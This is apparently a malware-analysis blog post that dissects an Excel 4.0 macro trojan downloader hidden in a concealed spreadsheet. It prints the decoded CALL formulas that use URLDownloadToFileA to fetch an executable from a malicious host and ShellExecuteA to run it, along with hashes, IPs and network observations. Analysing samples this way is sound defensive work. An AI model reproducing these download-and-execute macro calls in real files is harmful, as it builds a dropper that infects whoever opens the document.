Excel 4.0 macro Trojan Downloader

-

Hash: 89e62ec08b0b6065134c67937bae76ccd70163770fd6992574e41b9c82c3cf1c

Sample Download Link: beta.VirusBay.io

Application Name: Microsoft Excel

File Type: xls

VirusTotal Score: 29/60

Blg15_02052020_1

I came across this sample on VirusBay.io. I downloaded this malicious excel file on my VM for malware analysis.

OLEVBA.py

First thing I did analysis of VBA macro source code in excel file using OLETools.

Command > OLEVBA.py -a

Blg15_02052020_2

The result shows, macro will auto execute on opening file and it may run executable file may be using shell command and will download a file from remote server. The executable file name is FBpKzqF.exe

Document Property:

Blg15_02052020_3

XLM macro has been used in this file which is hidden.

Blg15_02052020_4

Steps To Make Macros Sheet Visible

Step 1

I enabled it by right click on the spreadsheet which is open in Excel and selected Unhide…

Blg15_02052020_6

And then a popup shows the name of spreadsheet I will select to unhide. Here name of sheet is SODXOFScMLy.

Blg15_02052020_7

Step 2

Along with this need to unblock the excel file and can be done by right click on excel file > General Tab > check option Unblock. I ran OLEVBA to check the visibility status of macro and now it turned to visible.

Blg15_02052020_21

While going through spreadsheet, I searched for keywords those I found in macro extracted using tool OLEVBA

OLEVBA macro extracted show a string value of C:\ProgramData\FBpKzqF.exe

Blg15_02052020_12

So I tried to look for .exe in spreadsheet, I was sure I will get something here and I found a link of a website  http:// gstat.dondyablo .com/ fattura.exe here fattura.exe is just a html page. (VirusTotal link here)

Blg15_02052020_11

Verification of above URL on VirusTotal shows URL is up and malicious and scores 17/79.

Blg15_02052020_13

I also did NSLookUp for URL. There are three IPs assigned to this site. First 2 from Russia and third one from Netherlands.

Blg15_02052020_14

Next I started looking for formula and Call functions in columns as I saw them in extracted macro by olevba.py. (screenshot below)

Blg15_02052020_22

I started with Call function, right click and run this call function.

Blg15_02052020_23

Click on Step in.

Blg15_02052020_24

Click on Evaluate will evaluate the values of parameters of call.

Blg15_02052020_25

Post Evaluation

=CALL($BZ$118,$HT$592, "JJCCJJ",0,$BB$54,$GI$1025,0,0)
Blg15_02052020_26

Here the value of

$BZ$118 = “URLMON”

$HT$559 = “URLDownloadToAFile”

$BB$54 = http:// gstat.dondyablo .com/ fattura.exe”

$GI$1024 = “C:\ProgramData\FBpKzqF.exe”

call("URLMON","URLDownloadToAFile","JJCCJJ",0,
"http:// gstat.dondyablo .com/ fattura.exe", 
"C:\ProgramData\FBpKzqF.exe")

There is another call function, I am evaluating to get the value of this call function.

=CALL($H$24,$GD$694, "JJCCCCJ",0,$I$1161,$GI$1025,,0,0)
Blg15_02052020_27

$H$24 = “Shell32”

$GD$694 = “ShellExecuteA”

$I$1161 = “open”

$GI$1025= “C:\ProgramData\FBpKzqF.exe”

=Call("Shell32", "ShellExecuteA", "JJCCJJ", 
"open", "C:\ProgramData\FBpKzqF.exe",,0,0)

Looking at these two call functions, I can say

  • The first call function will download the executable file from the URL
  • The second call function will execute the executable file on victims machine.

Next I will test, enable Internet on my VM and will run first call function instead of step in which will download the executable.

Network Log: 

Network log shows connection made to IP address 195. 22. 152. 76 and IP address resolved to DNS gstat. dondyablo .com

Blg15_02052020_31

Below image shows, it is downloaded ms dos application.

Blg15_02052020_35
Blg15_02052020_33

URL is hosted on Apache server and host server is Ubuntu.

Blg15_02052020_28

Process Explorer: 

Process explorer capture the TCP connection with remote IP address and download the executable file at two location

  • C:\ProgramData\FBpKzqF.exe
  • CC:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\fattura[1].exe (temp location)
Blg15_02052020_32
Blg15_02052020_30

Downloaded Executable File Information

File name: FBpKzqF.exe

File Type: Win32 EXE

Hash: cddf3cc072913f9e5b0a020b12a0d80184b34a82f6ea6f8f7e95475a87de268c

VirusTotal Score: 50/70

Blg15_02052020_34

Summary

  • Excel file is Excel 4.0 macro in hidden spreadsheet (SODXOFScMLy)
  • Macro call functions download executable FBpKzqF.exe
  • “http:// gstat.dondyablo .com/ fattura.exe” from where executable downloaded.
  • downloaded executable file is a trojan malware.

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

TROJAN AGENT TESLA – MALWARE ANALYSIS

-
Image
Hash – 077f75ef7fdb1663e70c33e20d8d7c4383fa13fd95517fab8023fce526bf3a25 Family : Agent Tesla Signature: Microsoft Visual C# v7.0/ Basic.NET Filename: UIhLdVHHlUAKoEOpjVAsXFlIQrgS.exe VirusTotal score: Malware behavior: Steal browser information (URL, Usernames, Passwords) Steal passwords for email clients. Steal FTP Clients Steal download manager passwords. Collect OS and hardware information. Browser Information: When I debug the malware executable, Initially it creates a SQLite database to store collected information from victims machine. Below are the tables getting created. Tables created: meta logins sqlite_sequence stats compromised_credentials found it collected browsers data (Google chrome), that includes accessed URLs and related usernames and passwords. database table  logins  stores all browser related information. Below are the table columns. Apart from this, malware also look for all different types of ...
Lire la suite

{ FIT-HACK#2017 } - Binary 100 - Random

-
Image
Binary 100 - Random Pour ce challenge on a un binaire (ELF 64). On essaie de l'exécuter une première fois, et on voit qu'il y a 10 round, et on suppose qu'à chaque round on doit trouver le nombre aléatoire. On utilise alors GDB pour comprendre le fonctionnement du programme: On peut voir que valeur que l'on entre est comparée à l'instruction qui se trouve à l'adresse 0x0000000000400783 (main+134): On met alors un breakpoint à cette instruction, on démarre le programme et on entre une valeur au hasard. Arrivé au breakpoint, on affiche la valeur en $rbp-0x88 : Pour être sur que la valeur généré par le programme est bien aléatoire, on lance le programme, on entre la même valeur que précédemment et on regarde la valeur en $rbp-0x88 : La valeur est la même! On met alors la valeur dans la variable EAX et on continue le programme. On affiche de nouveaux la valeur de $rbp-0x88 et on l'assigne à EAX. On effectue ces actions pour les 10 rounds e...
Lire la suite